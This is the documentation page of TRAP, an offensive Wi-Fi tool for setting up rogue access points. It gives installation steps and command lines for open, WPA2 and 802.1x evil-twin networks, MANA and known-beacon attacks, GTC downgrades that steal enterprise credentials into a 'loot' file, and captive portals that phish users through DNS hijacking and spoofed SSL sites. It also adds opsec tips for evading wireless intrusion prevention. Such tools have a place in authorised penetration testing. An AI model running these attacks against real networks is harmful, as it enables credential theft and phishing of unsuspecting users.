Skip to main content

TRAP

TRAP logo

Generic recommendations for Rogue AP​

Opsec Considerations
  • Enable 802.11w to prevent deauthentication frames from WIPS.
  • Spoof BSSID of an AP that is not in the wireless range to avoid BSS conflicts.
  • You cannot target specific devices using MAC-based Management Frame ACL for beacon frames related attacks.
tip

For EAPHammer hardware modes use flag --hw-mode (default is 802.11a or 802.11b depending on specified channel):

  • 802.11b Older specification, 2.4GHz only.
  • 802.11a Used for creating 5GHz access points.
  • 802.11g Used for creating 2.4GHz access points.
  • 802.11n Can be used on both the 2.4GHz and 5GHz spectrums (default uses 20MHz channel else use --channel-width 40).

Installation tested on Kali 2020.3​

git clone https://github.com/Piosky/TRAP.git
apt update
apt install nginx dnsmasq
info

If you have iptables compatibility issues choose /usr/sbin/iptables-nft.

update-alternatives --config iptables
info

For ARM distributions only.

mv scripts/hostapd-eaphammer.arm scripts/hostapd-eaphammer
warning

Please note that the hostapd-eaphammer binaries are dynamically linked. You may have to compile your own version of hostpad-eaphammer.

Check the options

python3 trap -h

Configuration files​

All the configuration files are stored in the config folder.

802.1x configuration​

Certificates​

The certificates used for 802.1x authentication are stored in config/1/eap/certs and config/2/eap/certs depending on the instance number specified.

You can create 802.1x certificate using TRAP.

python3 trap --cert <instance_number>

If you choose to provide your own certificates, please name related files accordingly: ca.pem, server.pem, privkey.pem and dhparam.pem.

Known credentials​

If you know valid 802.1x credentials you can put them in the config/eap/known_creds.txt file. It will allow a successful authentication.

Each line must contain the username and the password seperated by a tab.

Captive portal configuration​

Captive sites​

All web sites that will be spoofed via DNS hijacking are placed in config/captive_sites.txt file.

Rogue web sites​

The web root directory is config/captive_portal/nginx/www. You can configure your own phishing scenario by modifying the website and the nginx configuration accordingly.

SSL configuration​

You have to create a folder named according to the domain name.

config/captive_portal/nginx/ssl/<domain_name>

This folder has to contain three files named:

  • fullchain.pem
  • privkey.pem
  • ssl-dhparams.pem

802.1x authentication materials loot file​

All gathered 802.1x credentials and hashes are stored in config/<instance_number>/loot_eap.txt.

Usage​

For all type of rogue access point, the option --captive-portal or -w can be used to enable the captive portal feature and perform phishing attacks based on the user-agent.

Open AP​

Create an open rogue access point.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID>

WPA2 PSK AP​

Create a WPA2 PSK rogue access point.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> -p <PSK>

802.1x AP​

Create a 802.1x rogue access point to steal credentials.

You can perform a GTC downgrade by specifying its mode (full/weakest/balanced) via the option --downgrade.

It uses eaphammer's methodology as described here.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --eap [--downgrade balanced]

Management Frame ACL​

The files must contain one BSSID or ESSID by line.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --bssid-whitelist </path/to/bssid_whitelist.txt>
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --bssid-blacklist </path/to/bssid_blacklist.txt>
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --ssid-whitelist </path/to/ssid_whitelist.txt>
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --ssid-blacklist </path/to/ssid_blacklist.txt>

MANA​

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -m

Known beacon attack​

Known ESSIDs are stored in config/<instance_number>/known_ssid.txt.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <BSSID> --mana --known-beacons

Captive Portal​

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> -w

SSL domain​

The captive portal option must be set when --ssl is used.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --captive-portal --ssl <domain_name>

Channel bonding​

It is possible to enable channel bonding to create 40MHz channels using the option --ht.

Cleaning​

It cleans all configuration and loot files except for all the files under /captive_portal folder.

python3 trap --clean

Specifications when using two instances of TRAP​

It is the first instance that decides if there is a captive portal or not.